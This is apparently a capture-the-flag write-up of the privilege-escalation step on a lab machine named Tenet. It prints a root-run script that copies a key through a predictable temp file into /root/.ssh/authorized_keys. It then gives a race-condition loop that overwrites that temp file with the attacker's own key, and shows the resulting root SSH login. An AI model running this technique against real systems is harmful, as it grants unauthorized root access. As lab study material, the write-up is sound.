4 privesc
cat enableSSH.sh
#!/bin/bash
checkAdded() {
sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
/bin/echo "Successfully added $sshName to authorized_keys file!"
else
/bin/echo "Error in adding $sshName to authorized_keys file!"
fi
}
checkFile() {
if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
/bin/echo "Error in creating key file!"
if [[ -f $1 ]]; then /bin/rm $1; fi
exit 1
fi
}
addKey() {
tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
(umask 110; touch $tmpName)
/bin/echo $key >>$tmpName
checkFile $tmpName
/bin/cat $tmpName >>/root/.ssh/authorized_keys
/bin/rm $tmpName
}
key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu"
addKey
checkAdded
All binaries are using absolute path so we need to understand the code.
- addKey()
1. creates a temp file as /tmp/ssh-<something-random>
2. saves $key in $tmpName
3. check if properly created
4. copies the $key (which is $tmpName) into authorized_keys
5. removes the $tmpName
If we can overwrite the file with our own public key, we can ssh in.
# generated using ssh-keygen -f id_rsa
neil@tenet:~$ while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTO/tgLW50ljdMpBm23mKHlYNqz1+iY2MCJy1p179VEc3r6POyCUwiVpEjy+PR1rQ2jee2M5VeGUSa9xcrzWTexszGTExWbpT8y68J6+UMUg6Ud1YwBWJo7EF4+8SUeAg+B12g6ygavw5EwZgASnwi3OcpUhEY4+YftyueEbYrkFd5B2NEywarDATJIL3RzeszAOVUuqEip7M9IZ2+LHyLTtiEWvo65UGBxLF+t8gtD3mDMkkUjpnRdKjqbomJfaIhD4V7q6ym/x3dRVL5+8Cl+S25Gc3cH+WWWRUod4hleepK0riVEjZSjJCgUKz87JXlVf+642QUAwQ3XPEsMzG3Chaoa5BKA0NuXKskG5VIZN0RtrVbrxiofcr3WiopttUaepFB7xUYeY+takzDE6gC146XEgc32mmkoZfs7DA6B/RA1ek7oRbeL7vKEJIMz2g4TcNixE4JOpIfC4pyokQ7jQjAZQzDFl+ilpV9PDLhqPLCo5KGLV2+3PspQWvlo0s= kashz@kali" | tee /tmp/ssh* 2> /dev/null; done
# (another terminal window)
neil@tenet:~$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!
$ ssh -i id_rsa root@10.10.10.223
root@tenet:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated